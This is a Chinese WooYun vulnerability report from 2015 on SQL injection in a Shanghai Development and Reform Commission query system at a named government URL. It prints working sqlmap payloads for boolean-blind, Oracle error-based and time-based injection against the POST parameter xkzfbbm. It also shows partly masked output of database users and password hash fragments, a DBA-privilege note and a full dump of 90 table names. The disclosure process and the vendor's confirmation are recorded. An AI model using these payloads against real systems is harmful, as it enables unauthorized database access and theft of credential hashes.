当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090280

漏洞标题:上海市发改委某查询系统SQL注入

相关厂商:上海市发改委

漏洞作者: RedFree

提交时间:2015-01-07 11:34

修复时间:2015-02-21 11:36

公开时间:2015-02-21 11:36

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-07: 细节已通知厂商并且等待厂商处理中
2015-01-12: 厂商已经确认,细节仅向厂商公开
2015-01-22: 细节向核心白帽子及相关领域专家公开
2015-02-01: 细节向普通白帽子公开
2015-02-11: 细节向实习白帽子公开
2015-02-21: 细节向公众公开

简要描述:

上海市发改委某查询系统对查询的参数过滤不严格,导致SQL注入。

详细说明:

查询页:http://jgjc.shdrc.gov.cn/gzcx/listFbXX.do

Place: POST
Parameter: xkzfbbm
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sfdw=%E4%B8%8A%E6%B5%B7%E5%B8%82%E4%BB%B7%E6%A0%BC%E8%AE%A4%E8%AF%8
1%E4%B8%AD%E5%BF%83&xkzfbbm=00002021000' AND 5786=5786 AND 'BAQG'='BAQG&yxqz=201
6%E5%B9%B406%E6%9C%88&dwmc=&MaxPage=17
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: sfdw=%E4%B8%8A%E6%B5%B7%E5%B8%82%E4%BB%B7%E6%A0%BC%E8%AE%A4%E8%AF%8
1%E4%B8%AD%E5%BF%83&xkzfbbm=00002021000' AND 6859=(SELECT UPPER(XMLType(CHR(60)|
|CHR(58)||CHR(113)||CHR(111)||CHR(110)||CHR(105)||CHR(113)||(SELECT (CASE WHEN (
6859=6859) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(99)||CHR(119)||CHR(119)|
|CHR(113)||CHR(62))) FROM DUAL) AND 'uHJf'='uHJf&yxqz=2016%E5%B9%B406%E6%9C%88&d
wmc=&MaxPage=17
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: sfdw=%E4%B8%8A%E6%B5%B7%E5%B8%82%E4%BB%B7%E6%A0%BC%E8%AE%A4%E8%AF%8
1%E4%B8%AD%E5%BF%83&xkzfbbm=00002021000' AND 9986=DBMS_PIPE.RECEIVE_MESSAGE(CHR(
117)||CHR(71)||CHR(74)||CHR(68),5) AND 'HEEl'='HEEl&yxqz=2016%E5%B9%B406%E6%9C%8
8&dwmc=&MaxPage=17
---
[15:19:55] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[15:19:55] [INFO] fetching current database
[15:19:55] [INFO] resumed: WJJ
[15:19:55] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'WJJ'


当前数据库账号的权限很高:

mask 区域 
*****MS: Or*****
*****abase on Oracle):*****
*****MS: Or*****
*****  '*****
*****is DBA:*****
*****MS: Or*****
*****tem users pa*****
*****_USER*****
*****d hash*****
*****RATOR_RO*****
*****d hash*****
*****_ROLE *****
*****d hash*****
*****C [1*****
*****: CBBE049*****
*****NECT*****
*****d hash*****
*****SER [*****
*****d hash*****
*****_FGWW*****
*****: 4872ABF*****
*****BA *****
*****d hash*****
*****NMP *****
*****: 141EB2C*****
*****TALOG_R*****
*****d hash*****
*****IP *****
*****: CE4A36B*****
*****IENT *****
*****d hash*****
*****ATALOG_*****
*****d hash*****
*****SYS *****
*****: 66F4EF5*****
*****DATABAS*****
*****d hash*****
*****OA [*****
*****: 79DED9E*****
*****FGWWW*****
*****: 808E498*****
*****EM_STATI*****
*****d hash*****
*****_USER_R*****
*****d hash*****
*****GL [*****
*****: 3C89E1F*****
*****N_ROLE*****
*****d hash*****
*****DATABAS*****
*****d hash*****
*****ADMIN*****
*****d hash*****
*****DEPLO*****
*****d hash*****
*****UGPRIV*****
*****d hash*****
*****DPRIV*****
*****d hash*****
*****YSPRI*****
*****d hash*****
*****RPRIV *****
*****d hash*****
*****C [1*****
*****: D55C862*****
*****TEST *****
*****: AE8D91B*****
*****TEST *****
*****: 63B88CB*****
*****MINISTRA*****
*****d hash*****
*****USER *****
*****d hash*****
*****VIEW *****
*****: 5D598A9*****
*****L [1*****
*****: FFF1E5C*****
*****012 [*****
*****: 2A37EE8*****
*****DVISO*****
*****d hash*****
*****ONITO*****
*****d hash*****
*****DBA [*****
*****d hash*****
*****USER *****
*****d hash*****
*****RACE_U*****
*****d hash*****
*****PSYS*****
*****hash: i*****
*****E_OCM*****
*****: 6D17CF1*****
*****FGW *****
*****: DC54977*****
*****_FGWW*****
*****: 066FC65*****
*****LN [*****
*****: 4A3BA55*****
*****TAT [*****
*****: 5D44E3B*****
*****LIC *****
*****d hash*****
*****TALOG_OW*****
*****d hash*****
*****RCE [*****
*****d hash*****
*****ER_ADM*****
*****d hash*****
*****DE *****
*****: E1E1402*****
*****TALOG_R*****
*****d hash*****
*****MS *****
*****: 23C574F*****
*****TEST*****
*****: 3316873*****
*****YS *****
*****: F337971*****
*****MAN *****
*****: E213F6D*****
*****TEM *****
*****: BD9800F*****
*****SHOW *****
*****: 4884228*****
*****T [1*****
*****: A8E2250*****
*****SYS *****
*****: 3DF26A8*****
*****FICE *****
*****: 19908F8*****
*****JJ *****
*****: 799539C*****
*****2_TES*****
*****: E8D618C*****
*****N_ROLE*****
*****d hash*****
*****YS [*****
*****: 7C9BA36*****
*****S [1*****
*****: 2C8224E*****
*****T [1*****
*****: 822D434*****
*****K [1*****
*****: 1E83E59*****
*****TEST *****
*****: C316F67*****
*****G [1*****
*****: 8393B72*****
*****012 [*****
*****: 74BE52E*****
*****L [1*****
*****: 43B64C2*****
*****Y [1*****
*****: FDF5F81*****
*****P [1*****
*****: 99EE5BD*****

漏洞证明:

Database: WJJ
[90 tables]
+------------------------+
| CBSB_SHYJ              |
| CBSB_XMQD              |
| CBSB_XMQD_TEMP         |
| CBSB_ZB                |
| CBSB_ZB_TEMP           |
| CBSB_ZC                |
| CBSB_ZC_TEMP           |
| DWJB_WHB               |
| DWSX_WHB               |
| FBTG_DWB               |
| FBTG_ZB                |
| GBF_WHB                |
| GZFW_HMD               |
| GZFW_XKZFB             |
| GZFW_XKZZB             |
| HZB                    |
| IP_WHB                 |
| LBQYFL                 |
| LICENSE_CONFIG         |
| LOCKLOG                |
| MESSAGEV2              |
| MSGRTYPE               |
| NSKB_CONFIG            |
| OTHERUSER              |
| PZBM_WHB               |
| PZQXFL                 |
| PZQX_WHB               |
| QXZL                   |
| SFDW_CONFIG            |
| SFDW_ZB                |
| SFDW_ZB_LOG            |
| SFDW_ZB_TEMP           |
| SFDX_WHB               |
| SFLB_WHB               |
| SFNS_JL_WHB            |
| SFNS_ND_WHB            |
| SFNS_REJECTION_ITEM    |
| SFNS_REJECTION_UNIT    |
| SFNS_SHYJ              |
| SFNS_XMQD              |
| SFNS_XMQD_TEMP         |
| SFNS_ZB                |
| SFNS_ZB_TEMP           |
| SFNS_ZT                |
| SFWJ_ZB                |
| SFXKZ_HZ_ZB            |
| SFXKZ_PRINT            |
| SFXKZ_SFXM             |
| SFXKZ_SFXM_LOG         |
| SFXKZ_SFXM_TEMP        |
| SFXKZ_ZB               |
| SFXKZ_ZB_LOG           |
| SFXMTJ                 |
| SFXM_CONFIG            |
| SFXM_SFDX              |
| SFXM_ZB                |
| SFXM_ZB_LOG            |
| SFXZSQ                 |
| SFXZ_WHB               |
| SH_CH                  |
| SH_DEPARTMENT          |
| SH_FEEAGENCY_DATA      |
| SH_FEEDIMCOIN          |
| SH_HISTORY             |
| SH_LICENSEANNUAL       |
| SH_LICENSESTAT         |
| SH_LICENSESTAT_VARIETY |
| SH_MID                 |
| SH_QY                  |
| SH_SFXM                |
| TEMP_SHBM_TO_GJBM      |
| TEMP_SHBM_TO_GJBM_WZ   |
| TEST                   |
| TJYMWHB                |
| USR_FILES              |
| USR_MAIL               |
| WJJLOCKLOG             |
| WJJ_NSHZ               |
| XKZ_PRINT_RECORD       |
| XKZ_PRINT_SFXM         |
| XMBD_WHB               |
| XTBM_WHB               |
| XTFL                   |
| XTXMFL                 |
| XZQYFL                 |
| XZQY_WHB               |
| YHJB_WHB               |
| YHJB_YMMC_WHB          |
| YHMAILS                |
| YH_WHB                 |
+------------------------+

修复方案:

过滤参数。

版权声明:转载请注明来源 RedFree@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-01-12 09:12

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给上海分中心,由其后续协调网站管理单位处置

最新状态:

暂无